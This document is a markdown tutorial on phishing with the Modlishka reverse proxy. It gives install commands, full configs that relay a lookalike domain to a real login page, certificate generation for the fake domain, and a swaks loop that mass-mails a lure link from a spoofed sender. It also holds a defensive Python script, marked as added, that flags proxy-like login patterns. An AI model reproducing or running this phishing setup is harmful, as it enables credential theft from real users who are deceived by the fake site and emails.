
# Phishing using Modlishka

## Installation

```bash
wget https://github.com/drk1wi/Modlishka/releases/download/v.1.1.0/Modlishka-linux-amd64
chmod +x Modlishka-linux-amd64
./Modlishka-linux-amd64 -h
```


## Usage

Modlishka needs a config file to run. It also requires a certificate and private key for a successful attack.

The key fields in the template below:

* `proxyDomain`: the domain that will be visited by the victim (the fake domain).
* `target`: the real, legitimate domain.
* `log`: the file that receives all logs.
* `cert` and `certKey`: your certificate and your private key.

```json
{
  "proxyDomain": "programmer-security.com",
  "listeningAddress": "0.0.0.0",
  "target": "programmersecurity.com",
  "targetResources": "",
  "targetRules": "",
  "terminateTriggers": "",
  "terminateRedirectUrl": "",
  "trackingCookie": "id",
  "trackingParam": "id",
  "jsRules": "",
  "forceHTTPS": false,
  "forceHTTP": false,
  "dynamicMode": false,
  "debug": true,
  "logPostOnly": false,
  "disableSecurity": false,
  "log": "requests.log",
  "plugins": "all",
  "cert": "",
  "certKey": "",
  "certPool": ""
}
```

## Attacking in a Lab Environment

In a lab environment, you can modify the environment's DNS records so that an arbitrary name, such as `test.programmersecurity.com`, resolves to your local IP address. When a victim visits test.programmersecurity.com, their traffic is directed to your IP.

Here we use Modlishka so that a user who visits test.programmersecurity.com sees the contents of programmersecurity.com. In this case, Modlishka works as a reverse proxy.

When the victim's traffic hits your IP on port 443 (HTTPS) or 80 (HTTP), Modlishka intercepts it. Instead of hosting a fake static HTML page, Modlishka acts as a dynamic bridge:

* It establishes a connection to the real backend server (`programmersecurity.com`).
* It pulls the legitimate login pages, assets, and scripts in real-time.
* It serves this authentic content back to the victim.
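Because the proxy opens its own connection to the real backend, the legitimate server sees every relayed victim arrive from the proxy's address rather than from the victim's. The following added example (not from the original page) shows how a defender could flag that pattern in backend authentication logs; the log format, sample lines, function names, and thresholds are assumptions made for illustration.

```python
# Added example: flag source IPs that log in as many distinct accounts.
# Assumed log format (constructed): "<UTC timestamp> <source IP> <user> <OK|FAIL>".
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample of backend authentication-log lines (not real data).
SAMPLE_LOG = """\
2024-05-01T08:00:00Z 192.0.2.80 heidi OK
2024-05-01T09:00:05Z 198.51.100.10 alice OK
2024-05-01T09:01:10Z 198.51.100.10 bob OK
2024-05-01T09:02:00Z 198.51.100.10 carol OK
2024-05-01T09:05:00Z 203.0.113.7 dave OK
2024-05-01T09:07:30Z 203.0.113.7 erin OK
2024-05-01T09:09:00Z 203.0.113.7 dave OK
2024-05-01T09:15:45Z 203.0.113.7 frank OK
2024-05-01T09:21:00Z 192.0.2.44 grace FAIL
2024-05-01T11:00:00Z 192.0.2.80 ivan OK
2024-05-01T14:00:00Z 192.0.2.80 judy OK
"""

def parse_line(line):
    """Split one log line into (datetime, ip, user, result)."""
    ts, ip, user, result = line.split()
    return datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ"), ip, user, result

def suspected_proxies(log_text, min_users=3, window=timedelta(minutes=30),
                      allowlist=frozenset()):
    """Return {ip: [users]} for IPs with >= min_users distinct successful
    logins inside any sliding window. allowlist holds known shared egress
    addresses (office NAT, VPN) that legitimately carry many users."""
    by_ip = defaultdict(list)
    for line in filter(str.strip, log_text.splitlines()):
        ts, ip, user, result = parse_line(line)
        if result == "OK" and ip not in allowlist:
            by_ip[ip].append((ts, user))
    flagged = {}
    for ip, events in by_ip.items():
        events.sort()
        start = 0
        for end in range(len(events)):
            # Shrink the window from the left until it spans <= `window`.
            while events[end][0] - events[start][0] > window:
                start += 1
            users = {user for _, user in events[start:end + 1]}
            if len(users) >= min_users:
                flagged[ip] = sorted(users.union(flagged.get(ip, [])))
    return flagged

if __name__ == "__main__":
    print(suspected_proxies(SAMPLE_LOG, allowlist={"198.51.100.10"}))
```

In the sample, `203.0.113.7` stands in for the proxy host and `198.51.100.10` for an allowlisted office egress; an address whose logins are spread over hours is not flagged.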

### Generating Certificates

We can also generate a legitimate SSL certificate.

```
openssl genrsa -out test.programmersecurity.com.key 2048
openssl req -new -key test.programmersecurity.com.key -out test.programmersecurity.com.csr -utf8 -batch -subj '/CN=test.programmersecurity.com'
```

### Using awk

The commands below print the certificate and private key as single lines with escaped newlines, so they can be pasted easily into your Modlishka config file.

```
awk -v ORS='\\n' '1' test.programmersecurity.com.crt
awk -v ORS='\\n' '1' test.programmersecurity.com.key
```

### Config file

```
{
  "proxyDomain": "test.programmersecurity.com",
  "listeningAddress": "0.0.0.0",
  "target": "https://login.programmersecurity.com",
  "targetResources": "",
  "targetRules": "",
  "terminateTriggers": "",
  "terminateRedirectUrl": "",
  "trackingCookie": "id",
  "trackingParam": "id",
  "jsRules": "",
  "forceHTTPS": false,
  "forceHTTP": false,
  "dynamicMode": false,
  "debug": true,
  "logPostOnly": false,
  "disableSecurity": true,
  "log": "requests.log",
  "plugins": "all",
  "cert": "-----BEGIN CERTIFICATE-----\n[SINGLE_LINE_CRT]\n-----END CERTIFICATE-----\n",
  "certKey": "-----BEGIN PRIVATE KEY-----\n[SINGLE_LINE_KEY]\n-----END PRIVATE KEY-----\n",
  "certPool": ""
}
```

### Run Modlishka

You can create your own JSON config file.

```
./modlishka -config programmersecurity_proxy.json
```


### Send emails using swaks

```bash
# Read one recipient per line from emails.txt and send the message to each.
while read -r address; do
  swaks -t "$address" -from 'robert@programmersecurity.com' \
    -body "hey https://test.programmersecurity.com" \
    -header "Subject: lol" -server 10.10.10.10
done < emails.txt
```


